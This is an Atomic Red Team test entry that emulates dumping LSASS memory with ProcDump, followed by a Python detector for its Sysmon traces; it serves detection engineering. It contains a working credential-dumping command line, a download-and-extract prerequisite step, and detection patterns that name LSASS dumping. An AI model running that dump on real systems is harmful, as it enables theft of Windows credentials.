## Atomic Test #1 - Dump LSASS.exe Memory using ProcDump

The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. Upon successful execution, you should see the following file created: c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.

**Supported Platforms:** Windows

**auto_generated_guid:** 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8

#### Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | path | C:\Windows\Temp\lsass_dump.dmp |
| procdump_exe | Path of Procdump executable | path | PathToAtomicsFolder\..\ExternalPayloads\procdump.exe |

#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

```cmd
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
```

#### Cleanup Commands:

```cmd
del "#{output_file}" >nul 2> nul
```

#### Dependencies: Run with `powershell`!

##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})

##### Check Prereq Commands:

```powershell
if (Test-Path "#{procdump_exe}") {exit 0} else {exit 1}
```

##### Get Prereq Commands:

```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" "PathToAtomicsFolder\..\ExternalPayloads\Procdump" -Force
New-Item -ItemType Directory (Split-Path "#{procdump_exe}") -Force | Out-Null
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe" "#{procdump_exe}" -Force
```
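The point of running this atomic is to confirm that the three observables it produces are caught: the ProcDump command line naming lsass, the handle opened on lsass.exe with memory-read rights, and the .dmp written to the temp directory. The following detection logic is an added example for that purpose, not code from the Atomic Red Team project. It runs over constructed Sysmon-style events (EID 1 ProcessCreate, EID 10 ProcessAccess, EID 11 FileCreate); the field names follow Sysmon's schema, while the allowlist of processes that legitimately read lsass and the sample paths are assumptions to tune per environment.

```python
"""Detection logic for the LSASS dump produced by the ProcDump atomic above.

Sample events below are constructed to mirror the test; they are not real telemetry.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# GrantedAccess bits on a Sysmon EID 10 that permit reading another process's memory.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400

# Assumption: processes that open lsass.exe with read rights on a healthy host.
# Paths are compared lower-case. Tune this to your own baseline.
LSASS_ACCESS_ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
}

# ProcDump dump-type switches (-ma full, -mp miniplus, -mm/-m mini), as a token.
DUMP_FLAG = re.compile(r"(^|\s)-m[apm]?(\s|$)")
# "lsass" or "lsass.exe" as its own command-line token (renamed procdump still names it).
LSASS_TOKEN = re.compile(r"(^|\s|\\)lsass(\.exe)?(\s|$)")


@dataclass
class Finding:
    rule: str
    event_id: int
    detail: str


def _is_lsass(image: str) -> bool:
    return image.lower().endswith("\\lsass.exe")


def check_process_create(ev: Dict) -> Optional[Finding]:
    """EID 1 / 4688: a ProcDump-style command line that targets lsass."""
    cmd = ev.get("CommandLine", "").lower()
    if LSASS_TOKEN.search(cmd) and DUMP_FLAG.search(cmd):
        return Finding("procdump_lsass_cmdline", 1, cmd)
    return None


def check_process_access(ev: Dict) -> Optional[Finding]:
    """EID 10: a non-allowlisted process opened lsass.exe with PROCESS_VM_READ."""
    if not _is_lsass(ev.get("TargetImage", "")):
        return None
    granted = int(ev.get("GrantedAccess", "0x0"), 16)
    source = ev.get("SourceImage", "").lower()
    if granted & PROCESS_VM_READ and source not in LSASS_ACCESS_ALLOWLIST:
        return Finding("lsass_memory_read", 10, f"{source} GrantedAccess={granted:#x}")
    return None


def check_file_create(ev: Dict) -> Optional[Finding]:
    """EID 11: a .dmp file whose name references lsass (the atomic's default output)."""
    target = ev.get("TargetFilename", "").lower()
    if target.endswith(".dmp") and "lsass" in target.rsplit("\\", 1)[-1]:
        return Finding("lsass_dump_file", 11, target)
    return None


CHECKS = {1: check_process_create, 10: check_process_access, 11: check_file_create}


def scan(events: List[Dict]) -> List[Finding]:
    """Apply the per-event-type check to each event and collect findings in order."""
    findings = []
    for ev in events:
        check = CHECKS.get(ev.get("EventID"))
        if check:
            finding = check(ev)
            if finding:
                findings.append(finding)
    return findings


# Constructed sample telemetry mirroring one run of the atomic, plus benign noise.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\AtomicRedTeam\ExternalPayloads\procdump.exe",
     "CommandLine": r'"procdump.exe" -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp'},
    {"EventID": 10, "SourceImage": r"C:\AtomicRedTeam\ExternalPayloads\procdump.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\system32\csrss.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1410"},
    {"EventID": 11, "Image": r"C:\AtomicRedTeam\ExternalPayloads\procdump.exe",
     "TargetFilename": r"C:\Windows\Temp\lsass_dump.dmp"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\a\notes.txt"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] EID {f.event_id}: {f.detail}")
```

The EID 10 rule is the one worth keeping even after the cleanup step deletes the dump file and the command line is changed: any memory-read handle on lsass.exe from outside the baseline set is the durable signal, and the allowlisted csrss.exe event in the sample shows why the allowlist is needed to keep it quiet.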